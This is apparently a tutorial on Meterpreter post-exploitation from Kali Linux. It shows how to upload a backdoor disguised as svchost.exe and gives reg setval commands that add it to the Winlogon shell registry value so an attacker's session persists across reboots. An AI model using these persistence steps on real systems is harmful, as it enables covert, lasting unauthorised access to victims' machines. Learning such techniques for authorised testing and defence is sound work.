If Kali Linux has acquired a meterpreter shell of the victim's system, the shell supports a variety of attack commands, including system privilege escalation, keylogging, snapshots, registry, and processes.
It supports the ability to manipulate the registry among attack commands, which is that the session breaks when the victim reboots, so if the backdoor is registered in the automatic registry, the session continues.
Kali Linux Registry
An attacker uploads a backdoor (svchost.exe) to a specific location to infiltrate the victim's system later after successful penetration. Also, register the backdoor in the start registry so that the victim automatically connects with the attacker upon reboot.
Kali Linux Registry Manipulation
Once the registry has been tampered with in the meterpreter shell, go to the victim's system and run the Registry Editor window. When you navigate to the startup registry path, the svchost.exe is registered.
⊙ reg enumkey
○ Enumerate registry keys
○ reg enumkey -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon"
○ -k : registry path
⊙ reg queryval
○ Query registry keys
○ reg queryval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell
○ -k : registry path
○ -v : Registry Value Name
⊙ reg setval
○ Add/modify registry values
○ reg setval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell -d "explorer.exe C:\\Windows\svchost.exe"
